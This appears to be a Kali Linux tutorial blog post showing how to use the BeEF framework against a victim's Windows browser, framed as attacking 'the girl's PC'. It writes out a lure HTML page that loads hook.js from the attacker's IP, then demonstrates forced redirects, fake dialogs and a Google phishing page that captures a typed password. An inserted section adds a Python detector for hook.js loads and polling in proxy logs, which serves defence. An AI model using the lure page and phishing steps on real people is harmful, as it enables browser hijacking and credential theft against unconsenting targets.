Environment:

Kali Linux (192.168.0.114): the attacker's device

Windows 7 (192.168.0.113): the girl's PC

Meet BeEF

BeEF (The Browser Exploitation Framework) is a browser attack framework written in Ruby. It is a module installed by default in Kali and is used to attack and exploit XSS vulnerabilities.

BeEF works mainly by inserting a JS script called hook.js into a web page. When a browser visits a page containing hook.js (the hook), it becomes hooked. The hooked browser runs the initial code and returns some information. After that, the target host sends a request to the BeEF server at regular intervals (every 1 second by default), asking whether there is new code to execute. The BeEF server is essentially a web application, divided into a front end and a back end. The front end polls the back end for new data that needs updating, and the front end can also send instructions to the back end. The BeEF operator logs in to the BeEF back end through a browser to control the front end (the user's browser). BeEF is generally used in conjunction with XSS vulnerabilities.
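
Seen from the defender's side, the behaviour described above (a script load of hook.js followed by requests to the same server roughly every second) stands out in web proxy logs. The following detection sketch is an added example, not part of the original post or of BeEF; the log format, the thresholds, the /poll path and the second client are assumptions constructed for the sample.

```python
from collections import defaultdict
from statistics import mean, pstdev
from urllib.parse import urlsplit

# Constructed proxy log (assumed format: epoch_seconds client_ip method url).
# The IPs and hook.js URL are the lab values from this page; the /poll path
# and the 192.168.0.120 client are placeholders invented for the sample.
SAMPLE_LOG = """\
1700000000.0 192.168.0.113 GET http://192.168.0.114:3000/hook.js
1700000001.0 192.168.0.113 GET http://192.168.0.114:3000/poll
1700000002.0 192.168.0.113 GET http://192.168.0.114:3000/poll
1700000003.0 192.168.0.113 GET http://192.168.0.114:3000/poll
1700000004.0 192.168.0.113 GET http://192.168.0.114:3000/poll
1700000005.0 192.168.0.113 GET http://192.168.0.114:3000/poll
1700000000.0 192.168.0.120 GET http://intranet.example/index.html
1700000000.2 192.168.0.120 GET http://intranet.example/site.css
1700000000.4 192.168.0.120 GET http://intranet.example/app.js
1700000031.0 192.168.0.120 GET http://intranet.example/news.html
1700000031.3 192.168.0.120 GET http://intranet.example/logo.png
this line is malformed and is skipped
"""

def parse(log):
    """Yield (timestamp, client, destination host:port, path) per valid line."""
    for line in log.splitlines():
        parts = line.split()
        if len(parts) == 4:  # skip lines with the wrong field count
            url = urlsplit(parts[3])
            yield float(parts[0]), parts[1], url.netloc, url.path

def find_hooked_clients(log, min_requests=5, max_interval=2.0, max_jitter=0.5):
    """Flag client/destination pairs that fetched hook.js or poll on a steady short timer."""
    times, hook_loads = defaultdict(list), set()
    for ts, client, dest, path in parse(log):
        times[(client, dest)].append(ts)
        if path.rsplit("/", 1)[-1] == "hook.js":
            hook_loads.add((client, dest))
    findings = []
    for (client, dest), stamps in sorted(times.items()):
        stamps.sort()
        gaps = [b - a for a, b in zip(stamps, stamps[1:])]
        # Regular beaconing: enough requests, short mean gap, little variation.
        beaconing = (len(stamps) >= max(min_requests, 2) and mean(gaps) <= max_interval
                     and pstdev(gaps) <= max_jitter)
        if beaconing or (client, dest) in hook_loads:
            findings.append({"client": client, "dest": dest, "beaconing": beaconing,
                             "hook_js": (client, dest) in hook_loads})
    return findings
```

The bursty page loads from the second client are not flagged, because their mean gap is far above the polling threshold even though individual gaps are short.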

Start BeEF

Method 1: Click the icon in the Kali menu bar to start it.

Method 2: Execute the command beef-xss

Kali already packages beef-xss as a service, so we can also use the systemctl command to start or stop the beef service:

systemctl start beef-xss.service    # Start the beef service

systemctl stop beef-xss.service     # Stop the beef service

systemctl restart beef-xss.service  # Restart the beef service

Note: The initial configuration requires us to enter an account and password (set them yourself).

Once startup completes, the browser automatically opens the management page. Enter the account and password we just set to log in to the system. The initial account and password are beef.

Configure our hooks

Two methods are covered briefly here:

Method 1: Find a website with an XSS vulnerability and insert the JS there to reach the target.

Method 2: Write a malicious web page yourself for others to visit. (Internal network + external network)

Here we take Method 2 as the example and write a simple page.

<!doctype html>
<html>
<head>
<meta charset='utf-8'>
<title>la la la la la la la la la</title>
</head>
<body>
<h1>bbskali.cn</h1>
<script src='http://192.168.0.114:3000/hook.js'></script>
</body>
</html>

In other words, once someone else visits the page just written, the attack goal is achieved. There are many ways to get them there, such as man-in-the-middle attacks, redirection, defacement pages, etc.

Attack Demo

Demo 1 (device online)

When the attacked side visits our web page, we can see the device come online in the BeEF console.

Device Attack

Click on our device and select the Commands tab. We can see that there are many attack modules.

Readers may notice a small colored circle (green, gray, orange or red) in front of each module.

Internally, BeEF detects which command modules can work in the currently hooked browser and indicates this by color:

Green: The command module can run on the target browser, and the user will not notice anything unusual.

Orange: The command module can run on the target browser, but the user may notice something unusual (such as pop-ups, prompts, redirects, etc.).

Gray: The command module has not been verified for this target, i.e. it is not known whether it can run.

Red: The command module does not work for this target.

Here are a few modules as a demonstration. Explore the rest yourself!

Let the browser automatically access the specified website

Click Browser > Hooked Domain > Redirect Browser, enter our target URL and click Execute to complete the attack. Returning to the page I had just opened, I found that it had automatically jumped to the kali forum.

Pop up dialog box

Click Browser > Hooked Domain > Create Alert Dialog, enter the information we want to pop up and click Execute to complete the attack.

The effect is shown in the target browser.

Pop up an input prompt box

Click Browser > Hooked Domain > Create Prompt Dialog, enter the information we want to pop up and click Execute to complete the attack.

In the same way, after information is entered in the prompt, we can see what was just entered in the management panel under Results.

Make a phishing website

Select Social Engineering > Google Phishing, set it to our Kali IP address, and click Execute.

Our page has become Google's login page.

Enter an account and password.

Password obtained.